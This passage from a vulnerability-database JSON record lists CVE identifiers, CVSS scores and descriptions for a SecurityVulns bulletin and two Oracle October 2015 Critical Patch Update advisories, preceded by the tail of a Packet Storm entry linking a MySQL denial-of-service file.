\n \n`\n", "cvss": {"score": 4.0, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:NONE/I:NONE/A:PARTIAL/"}, "sourceHref": "https://packetstormsecurity.com/files/download/137232/mysqlprocedure-dos.txt"}], "securityvulns": [{"lastseen": "2018-08-31T11:10:03", "bulletinFamily": "software", "cvelist": ["CVE-2015-4894", "CVE-2015-4000", "CVE-2015-4851", "CVE-2015-4895", "CVE-2015-4905", "CVE-2015-4866", "CVE-2015-4832", "CVE-2015-4822", "CVE-2015-4830", "CVE-2015-4804", "CVE-2015-4816", "CVE-2015-0235", "CVE-2015-1793", "CVE-2015-4793", "CVE-2015-4863", "CVE-2015-4913", "CVE-2015-4892", "CVE-2014-0191", "CVE-2015-4796", "CVE-2015-4864", "CVE-2015-4794", "CVE-2015-4887", "CVE-2015-2642", "CVE-2015-4860", "CVE-2015-4868", "CVE-1999-0377", "CVE-2015-4820", "CVE-2015-4903", "CVE-2015-0286", "CVE-2015-4906", "CVE-2015-4843", "CVE-2015-4842", "CVE-2015-4910", "CVE-2015-4872", "CVE-2015-4846", "CVE-2014-3576", "CVE-2015-4876", "CVE-2014-3571", "CVE-2015-4883", "CVE-2014-7940", "CVE-2015-4858", "CVE-2015-4802", "CVE-2015-4882", "CVE-2015-4801", "CVE-2015-4878", "CVE-2015-4799", "CVE-2015-4811", "CVE-2015-4834", "CVE-2015-4762", "CVE-2015-4815", "CVE-2015-4812", "CVE-2015-4839", "CVE-2015-4798", "CVE-2015-4891", "CVE-2015-4734", "CVE-2015-4899", "CVE-2015-4865", "CVE-2015-4915", "CVE-2015-4871", "CVE-2015-4800", "CVE-2015-4869", "CVE-2015-4828", "CVE-2015-4803", "CVE-2015-4875", "CVE-2015-4902", "CVE-2015-4917", "CVE-2015-4909", "CVE-2015-4791", "CVE-2015-4805", "CVE-2015-4849", "CVE-2015-4879", "CVE-2015-4888", "CVE-2015-4838", "CVE-2015-4850", "CVE-2015-4806", "CVE-2015-4825", "CVE-2015-3144", "CVE-2015-4797", "CVE-2015-4792", "CVE-2015-4837", "CVE-2015-4904", "CVE-2015-4810", "CVE-2015-4827", "CVE-2014-0050", "CVE-2015-4817", "CVE-2015-4908", "CVE-2015-4912", "CVE-2015-4833", "CVE-2015-4847", "CVE-2015-4855", "CVE-2015-4848", "CVE-2015-4730", "CVE-2015-4819", "CVE-2015-4896", "CVE-2015-2633", "CVE-2015-4807", "CVE-2015-4901", "CVE-2015-4835", "CVE-2015-4873", "CVE-2015-4766", "CVE-2015-4795", "CVE-2015-4907", "CVE-2015-4859", "CVE-2015-1829", "CVE-2015-4898", "CVE-2015-4874", "CVE-2015-4836", "CVE-2015-4824", "CVE-2015-4900", "CVE-2015-4831", "CVE-2015-4861", "CVE-2015-4911", "CVE-2015-4886", "CVE-2015-2608", "CVE-2015-4809", "CVE-2015-4877", "CVE-2015-4844", "CVE-2015-4870", "CVE-2015-4881", "CVE-2015-4840", "CVE-2015-4856", "CVE-2015-4845", "CVE-2015-4914", "CVE-2015-4893", "CVE-2015-4916", "CVE-2015-4826", "CVE-2014-1569", "CVE-2015-4862", "CVE-2010-1622", "CVE-2015-4857", "CVE-2015-4890", "CVE-2015-4867", "CVE-2015-4884", "CVE-2015-4813", "CVE-2015-4841", "CVE-2015-4818", "CVE-2015-4880", "CVE-2015-1791", "CVE-2015-4823", "CVE-2015-4821"], "description": "Quarterly update closes 140 vulnerabilities in different applications.", "edition": 1, "modified": "2015-11-02T00:00:00", "published": "2015-11-02T00:00:00", "id": "SECURITYVULNS:VULN:14755", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:14755", "title": "Oracle / Sun / PeopleSoft / MySQL multiple security vulnerabilities", "type": "securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "oracle": [{"lastseen": "2020-10-04T21:16:00", "bulletinFamily": "software", "cvelist": ["CVE-1999-0377", "CVE-2010-1622", "CVE-2014-0050", "CVE-2014-0191", "CVE-2014-1569", "CVE-2014-3569", "CVE-2014-3570", "CVE-2014-3571", "CVE-2014-3572", "CVE-2014-3576", "CVE-2014-3707", "CVE-2014-7923", "CVE-2014-7926", "CVE-2014-7940", "CVE-2014-8146", "CVE-2014-8147", "CVE-2014-8150", "CVE-2014-8275", "CVE-2015-0204", "CVE-2015-0205", "CVE-2015-0206", "CVE-2015-0207", "CVE-2015-0208", "CVE-2015-0209", "CVE-2015-0235", "CVE-2015-0285", "CVE-2015-0286", "CVE-2015-0287", "CVE-2015-0288", "CVE-2015-0289", "CVE-2015-0290", "CVE-2015-0291", "CVE-2015-0292", "CVE-2015-0293", "CVE-2015-1787", "CVE-2015-1788", "CVE-2015-1789", "CVE-2015-1790", "CVE-2015-1791", "CVE-2015-1792", "CVE-2015-1793", "CVE-2015-1829", "CVE-2015-2522", "CVE-2015-2608", "CVE-2015-2633", "CVE-2015-2642", "CVE-2015-3144", "CVE-2015-3153", "CVE-2015-3183", "CVE-2015-3236", "CVE-2015-4000", "CVE-2015-4730", "CVE-2015-4734", "CVE-2015-4762", "CVE-2015-4766", "CVE-2015-4791", "CVE-2015-4792", "CVE-2015-4793", "CVE-2015-4794", "CVE-2015-4795", "CVE-2015-4796", "CVE-2015-4797", "CVE-2015-4798", "CVE-2015-4799", "CVE-2015-4800", "CVE-2015-4801", "CVE-2015-4802", "CVE-2015-4803", "CVE-2015-4804", "CVE-2015-4805", "CVE-2015-4806", "CVE-2015-4807", "CVE-2015-4809", "CVE-2015-4810", "CVE-2015-4811", "CVE-2015-4812", "CVE-2015-4813", "CVE-2015-4815", "CVE-2015-4816", "CVE-2015-4817", "CVE-2015-4818", "CVE-2015-4819", "CVE-2015-4820", "CVE-2015-4821", "CVE-2015-4822", "CVE-2015-4823", "CVE-2015-4824", "CVE-2015-4825", "CVE-2015-4826", "CVE-2015-4827", "CVE-2015-4828", "CVE-2015-4830", "CVE-2015-4831", "CVE-2015-4832", "CVE-2015-4833", "CVE-2015-4834", "CVE-2015-4835", "CVE-2015-4836", "CVE-2015-4837", "CVE-2015-4838", "CVE-2015-4839", "CVE-2015-4840", "CVE-2015-4841", "CVE-2015-4842", "CVE-2015-4843", "CVE-2015-4844", "CVE-2015-4845", "CVE-2015-4846", "CVE-2015-4847", "CVE-2015-4848", "CVE-2015-4849", "CVE-2015-4850", "CVE-2015-4851", "CVE-2015-4854", "CVE-2015-4856", "CVE-2015-4857", "CVE-2015-4858", "CVE-2015-4859", "CVE-2015-4860", "CVE-2015-4861", "CVE-2015-4862", "CVE-2015-4863", "CVE-2015-4864", "CVE-2015-4865", "CVE-2015-4866", "CVE-2015-4867", "CVE-2015-4868", "CVE-2015-4869", "CVE-2015-4870", "CVE-2015-4871", "CVE-2015-4872", "CVE-2015-4873", "CVE-2015-4874", "CVE-2015-4875", "CVE-2015-4876", "CVE-2015-4877", "CVE-2015-4878", "CVE-2015-4879", "CVE-2015-4880", "CVE-2015-4881", "CVE-2015-4882", "CVE-2015-4883", "CVE-2015-4884", "CVE-2015-4886", "CVE-2015-4887", "CVE-2015-4888", "CVE-2015-4890", "CVE-2015-4891", "CVE-2015-4892", "CVE-2015-4893", "CVE-2015-4894", "CVE-2015-4895", "CVE-2015-4896", "CVE-2015-4898", "CVE-2015-4899", "CVE-2015-4900", "CVE-2015-4901", "CVE-2015-4902", "CVE-2015-4903", "CVE-2015-4904", "CVE-2015-4905", "CVE-2015-4906", "CVE-2015-4907", "CVE-2015-4908", "CVE-2015-4909", "CVE-2015-4910", "CVE-2015-4911", "CVE-2015-4912", "CVE-2015-4913", "CVE-2015-4914", "CVE-2015-4915", "CVE-2015-4916", "CVE-2015-4917"], "description": "A Critical Patch Update (CPU) is a collection of patches for multiple security vulnerabilities. Critical Patch Update patches are usually cumulative, but each advisory describes only the security fixes added since the previous Critical Patch Update advisory. Thus, prior Critical Patch Update advisories should be reviewed for information regarding earlier published security fixes. Please refer to: Critical Patch Updates and Security Alerts for information about Oracle Security Advisories.\n\n**Oracle continues to periodically receive reports of malicious exploitation of vulnerabilities for which Oracle has already released fixes. In some instances, it has been reported that malicious attackers have been successful because customers had failed to apply available Oracle patches. Oracle therefore _strongly_ recommends that customers remain on actively-supported versions and apply Critical Patch Update fixes _without_ delay.**\n\nThis Critical Patch Update contains 270 new security fixes across the product families listed below. Please note that a blog entry summarizing the content of this Critical Patch Update and other Oracle Software Security Assurance activities is located at https://blogs.oracle.com/security.\n\nThis Critical Patch Update advisory is also available in an XML format that conforms to the Common Vulnerability Reporting Format (CVRF) version 1.1. More information about Oracle's use of CVRF is available at: http://www.oracle.com/security-alerts/cpufaq.html#CVRF.\n", "modified": "2016-09-29T00:00:00", "published": "2015-10-20T00:00:00", "id": "ORACLE:CPUOCT2015", "href": "", "type": "oracle", "title": "Oracle Critical Patch Update Advisory - October 2015", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:21:05", "bulletinFamily": "software", "cvelist": ["CVE-2015-4894", "CVE-2015-4000", "CVE-2015-4851", "CVE-2015-4895", "CVE-2015-4905", "CVE-2015-4866", "CVE-2015-4832", "CVE-2015-4822", "CVE-2015-4830", "CVE-2015-1792", "CVE-2015-4804", "CVE-2015-4816", "CVE-2015-0235", "CVE-2015-1793", "CVE-2015-4793", "CVE-2015-4863", "CVE-2014-7923", "CVE-2015-4913", "CVE-2015-4892", "CVE-2014-0191", "CVE-2015-4796", "CVE-2015-4864", "CVE-2015-4794", "CVE-2015-4887", "CVE-2015-2642", "CVE-2015-4860", "CVE-2015-3236", "CVE-2015-4868", "CVE-2014-3572", "CVE-2015-0206", "CVE-1999-0377", "CVE-2015-1789", "CVE-2015-4820", "CVE-2015-4903", "CVE-2015-0286", "CVE-2015-4906", "CVE-2014-8150", "CVE-2015-4843", "CVE-2015-4842", "CVE-2015-4910", "CVE-2015-4872", "CVE-2015-4846", "CVE-2014-3576", "CVE-2015-2522", "CVE-2015-4876", "CVE-2014-3571", "CVE-2015-4883", "CVE-2015-0288", "CVE-2014-7940", "CVE-2015-4858", "CVE-2015-4802", "CVE-2015-4882", "CVE-2015-4801", "CVE-2015-4878", "CVE-2015-4799", "CVE-2015-4811", "CVE-2015-4834", "CVE-2015-4762", "CVE-2015-0285", "CVE-2015-4815", "CVE-2015-4812", "CVE-2015-4839", "CVE-2015-4798", "CVE-2015-4891", "CVE-2015-4734", "CVE-2015-4899", "CVE-2015-3153", "CVE-2015-0207", "CVE-2015-4865", "CVE-2015-4915", "CVE-2015-4871", "CVE-2015-4800", "CVE-2014-8275", "CVE-2015-4869", "CVE-2015-0208", "CVE-2015-4828", "CVE-2015-4803", "CVE-2015-4875", "CVE-2015-4902", "CVE-2014-3570", "CVE-2015-4917", "CVE-2015-4909", "CVE-2015-4791", "CVE-2015-4805", "CVE-2015-4849", "CVE-2015-4879", "CVE-2015-4888", "CVE-2015-4838", "CVE-2015-4850", "CVE-2014-8147", "CVE-2015-4806", "CVE-2015-4825", "CVE-2015-3144", "CVE-2015-4797", "CVE-2015-4792", "CVE-2015-4837", "CVE-2015-4904", "CVE-2015-4810", "CVE-2015-4827", "CVE-2014-0050", "CVE-2015-4817", "CVE-2015-4908", "CVE-2014-3707", "CVE-2015-4912", "CVE-2015-0293", "CVE-2015-4833", "CVE-2015-4847", "CVE-2015-4848", "CVE-2015-4730", "CVE-2015-4819", "CVE-2015-4896", "CVE-2015-1788", "CVE-2015-2633", "CVE-2015-4807", "CVE-2014-8146", "CVE-2015-4901", "CVE-2015-4835", "CVE-2015-0209", "CVE-2015-3183", "CVE-2015-4873", "CVE-2015-4766", "CVE-2015-4795", "CVE-2015-4907", "CVE-2015-0204", "CVE-2014-7926", "CVE-2015-4859", "CVE-2015-1829", "CVE-2015-4898", "CVE-2015-4874", "CVE-2015-4836", "CVE-2015-4824", "CVE-2015-1790", "CVE-2015-4900", "CVE-2015-4831", "CVE-2015-4861", "CVE-2015-0291", "CVE-2015-4911", "CVE-2015-4886", "CVE-2015-2608", "CVE-2015-4809", "CVE-2015-4877", "CVE-2015-4844", "CVE-2015-4870", "CVE-2015-4881", "CVE-2015-4840", "CVE-2015-4854", "CVE-2015-0287", "CVE-2015-4856", "CVE-2015-4845", "CVE-2015-4914", "CVE-2015-4893", "CVE-2015-0289", "CVE-2015-4916", "CVE-2015-4826", "CVE-2015-0292", "CVE-2014-1569", "CVE-2015-4862", "CVE-2010-1622", "CVE-2015-4857", "CVE-2015-4890", "CVE-2015-4867", "CVE-2015-0290", "CVE-2015-0205", "CVE-2015-4884", "CVE-2015-4813", "CVE-2015-4841", "CVE-2015-1787", "CVE-2014-3569", "CVE-2015-4818", "CVE-2015-4880", "CVE-2015-1791", "CVE-2015-4823", "CVE-2015-4821"], "description": "A Critical Patch Update (CPU) is a collection of patches for multiple security vulnerabilities. Critical Patch Update patches are usually cumulative, but each advisory describes only the security fixes added since the previous Critical Patch Update advisory. Thus, prior Critical Patch Update advisories should be reviewed for information regarding earlier published security fixes. Please refer to:\n\n \n\n\n[Critical Patch Updates and Security Alerts](<http://www.oracle.com/technetwork/topics/security/alerts-086861.html>) for information about Oracle Security Advisories.\n\n \n\n\n**Oracle continues to periodically receive reports of malicious exploitation of vulnerabilities for which Oracle has already released fixes. In some instances, it has been reported that malicious attackers have been successful because customers had failed to apply available Oracle patches. Oracle therefore _strongly_ recommends that customers remain on actively-supported versions and apply Critical Patch Update fixes _without_ delay.**\n\n \n\n\nThis Critical Patch Update contains 153 new security fixes across the product families listed below. Please note that a blog entry summarizing the content of this Critical Patch Update and other Oracle Software Security Assurance activities is located at <https://blogs.oracle.com/security>.\n\n \n\n\nThis Critical Patch Update advisory is also available in an XML format that conforms to the Common Vulnerability Reporting Format (CVRF) version 1.1. More information about Oracle's use of CVRF is available at: <http://www.oracle.com/technetwork/topics/security/cpufaq-098434.html#CVRF>.\n\n \n\n", "modified": "2016-09-29T00:00:00", "published": "2015-10-20T00:00:00", "id": "ORACLE:CPUOCT2015-2367953", "href": "", "type": "oracle", "title": "Oracle Critical Patch Update - October 2015", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}]}
